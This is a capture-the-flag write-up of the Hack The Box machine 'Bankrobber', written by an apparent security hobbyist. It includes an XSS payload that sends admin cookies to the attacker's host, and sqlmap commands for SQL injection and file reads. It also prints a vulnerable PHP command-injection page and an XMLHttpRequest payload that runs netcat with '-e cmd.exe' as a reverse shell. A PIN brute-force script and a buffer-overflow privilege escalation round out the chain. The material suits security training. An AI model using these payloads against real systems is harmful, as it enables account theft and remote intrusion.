8 minuto(s) de lectura

Bankrobber is a web app box with a simple XSS and SQL injection that we have to exploit in order to get the source code of the application and discover a command injection vulnerability in the backdoor checker page that’s only reachable from localhost. By using the XSS to make a local request to that page, we can get land a shell on the box. To get root, we exploit a buffer in an application to override the name of the binary launched by the program.

Summary

  • The Transfer E-coin form contains an XSS vulnerability in the comment field
  • We can grab the administrator username and password and then log in to the site
  • There’s an SQL injection in the “Search users” function which we can use to dump the database and read files from the box
  • Using the XSS, we can turn it into an SSRF and get access to the “Backdoorchecker” page which is only accessible by the localhost
  • After getting the Backdoorchecker source code with the SQLi, we find a command injection vulnerability
  • Using the injection vulnerability, we can pop a shell with netcat and get the first flag
  • There’s a custom binary running a banking app on port 910 which we bruteforce to get the PIN
  • Once we have the PIN, we exploit a buffer overflow to execute an arbitrary program and get a shell as root

Portscan

root@kali:~/htb/bankrobber# nmap -T4 -sC -sV -p- 10.10.10.154
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-21 15:01 EDT
Nmap scan report for bankrobber.htb (10.10.10.154)
Host is up (0.052s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp  open  ssl/http     Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql        MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h00m06s, deviation: 0s, median: 1h00m06s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-09-21T20:03:12
|_  start_date: 2019-09-21T20:00:52

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.62 seconds

SMB

SMB is not reachable through null or guest sessions:

root@kali:~/htb/bankrobber# smbmap -u invalid -H 10.10.10.154
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[!] Authentication error on 10.10.10.154
root@kali:~/htb/bankrobber# smbmap -u '' -H 10.10.10.154
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on 10.10.10.154

MySQL

MySQL is not accessible remotely:

root@kali:~/htb/bankrobber# mysql -h 10.10.10.154 -u root -p
Enter password:

ERROR 1130 (HY000): Host '10.10.14.19' is not allowed to connect to this MariaDB server

Web enumeration

The website is a web application that allows users to buy E-coin cryptocurrency.

I can create an account by following the Register link.

After logging in I have the option of transferring funds to another user and to leave a comment.

When I transfer funds, I get a popup message saying the admin will review the transaction. This screams XSS to me because there’s a comment field that the admin will see and if it’s not sanitized correctly I’ll be able to inject javascript code in his browser session.

Exploiting the XSS

My XSS payload in the comments field is very simple: <script src="http://10.10.14.19/xss.js"></script>

This’ll make the admin browser download a javascript file from my machine and execute its code.

The xss.js will steal the session cookies from the admin and send them to my webserver.

function pwn() {
    var img = document.createElement("img");
    img.src = "http://10.10.14.19/xss?=" + document.cookie;
    document.body.appendChild(img);
}
pwn();

After a few minutes I get two connections. The first downloads the javascript payload and the second one is the connection from the script with the admin cookies.

The cookies contains the admin’s username and password Base64 encoded:

  • Username: admin
  • Password: Hopelessromantic

Exploiting the SQLi

Once logged in as administrator, I see that there’s a list of transactions, a search function for users and a backdoorchecker.

The backdoorchecker is only accessible from the localhost because it returns the following message when I try any commands: It's only allowed to access this function from localhost (::1). This is due to the recent hack attempts on our server.

The search function contains an obvious SQL injection since I get the following error after sending a single quote: There is a problem with your SQL syntax

This should be easy to exploit with sqlmap.

I’ll save one of the POST request from the search field in a search.req file:

POST /admin/search.php HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bankrobber.htb/admin/
Content-type: application/x-www-form-urlencoded
Content-Length: 6
Cookie: id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D
Connection: close

Then I run sqlmap -r search.req to start testing for injection points. As expected it quickly finds the injection point:

Exploring with sqlmap

First I’ll check which user the webapp is running as on the MySQL server: sqlmap -r search.req --current-user

current user: 'root@localhost'

I’m root so I should be able to get the passwords hashes with: sqlmap -r search.req --passwords

[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: *F435725A173757E57BD36B09048B8B610FF4D0C4

A quick search online shows the password for this hash is: Welkom1!

Nice but that doesn’t really help me for now. Next I’ll get the source code of various PHP files in the web app. This is a Windows box running Apache and PHP so I’m probably looking at a XAMPP stack. A quick search online shows the default base directory for XAMPP is: C:/xampp/htdocs

I can use the --file-read flag in sqlmap to read files:

sqlmap -r search.req --file-read '/xampp/htdocs/index.php' sqlmap -r search.req --file-read '/xampp/htdocs/admin/search.php' sqlmap -r search.req --file-read '/xampp/htdocs/admin/backdoorchecker.php'

The backdoorchecker.php is interesting because it contains an injection vulnerability in the system() function. There’s some filtering done on the provided cmd parameter: it has to start with dir and can’t contain $( or &. But that’s not enough to prevent injecting commands. Source code shown below:

<?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad 	  = array('$(','&');
$good 	  = "ls";

if(strtolower(substr(PHP_OS,0,3)) == "win"){
    $good = "dir";
}

if($username == "admin" && $password == "Hopelessromantic"){
    if(isset($_POST['cmd'])){
        // FILTER ESCAPE CHARS
        foreach($bad as $char){
            if(strpos($_POST['cmd'],$char) !== false){
                die("You're not allowed to do that.");
            }
        }
        // CHECK IF THE FIRST 2 CHARS ARE LS
        if(substr($_POST['cmd'], 0,strlen($good)) != $good){
            die("It's only allowed to use the $good command");
        }

        if($_SERVER['REMOTE_ADDR'] == "::1"){
            system($_POST['cmd']);
        } else{
            echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
        }
    }
} else{
    echo "You are not allowed to use this function!";
}
?>

Turning the XSS into an SSRF

As I found earlier I can’t reach the backdoorchecker.php file from my own machine but I can use the same XSS to turn it into a SSRF. I’ll need to change my javascript payload to generate a POST request to the backdoor checker page with the right parameters. After some trial an error I found that dir|\\\\10.10.14.19\\test\\nc.exe 10.10.14.19 7000 -e cmd.exe" payload works to execute netcat over SMB and get a shell.

function pwn() {
    document.cookie = "id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D";
    var uri ="/admin/backdoorchecker.php";
    xhr = new XMLHttpRequest();
    xhr.open("POST", uri, true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.send("cmd=dir|\\\\10.10.14.19\\test\\nc.exe 10.10.14.19 7000 -e cmd.exe");
}
pwn();

C:\xampp\htdocs\admin>type c:\users\cortin\desktop\user.txt
f6353466...

Privesc using bank transfer application

There’s something odd running on port 910…

I also see a bankv2.exe file in the system root directory but I can’t read it.

I generated an metasploit reverse shell payload, uploaded it then created a port forward for this port:

meterpreter > portfwd add -l 910 -p 910 -r 127.0.0.1
[*] Local TCP relay created: :910 <-> 127.0.0.1:910

I can reach the application now on port 910 but I don’t have a valid PIN:

I tried checking for buffer overflows but couldn’t crash the program so I likely have to brute force the PIN first. I made a quick script to brute force the PIN:

#!/usr/bin/python

from pwn import *
import time
import sys

i = int(sys.argv[1])
j = int(sys.argv[2])
while True:
    m = ""
    if i < j:
        pin = str(i).zfill(4)
        p = remote("127.0.0.1", 910)
        try:
            p.recvuntil("[$]", timeout=30)
            p.sendline("%s" % pin)
        except EOFError:
            print("Retry on %d" % i)
            continue
        try:
            m = p.recvline(timeout=10)
            print m
        except EOFError:
            print("Retry on %d" % i)
            continue
        if "Access denied, disconnecting client" not in m:
            print m
            exit(0)
        print "Doing ... " + str(i)
        i = i + 1
    else:
        print("We're done.")
        exit(0)
    p.close()

Thankfully the PIN was a low number so I didn’t have to search the entire PIN space: 0021

When I log in with the PIN, I can transfer coins and I see that the transfer.exe command is executed:

If I send a large string I can see there’s a buffer overflow present in the program since I no longer see the transfer.exe and it’s replaced by some characters that submitted in the amount field.

The offset is 32 bytes as shown below:

Note that whatever is overflowing from the amount variable gets into the name of the program that is executed after. So I can simply replace the executed program by a meterpreter payload I uploaded:

My meterpreter gets executed and I get a shell as NT AUTHORITY\SYSTEM

meterpreter > cat /users/admin/desktop/root.txt
aa65d8e...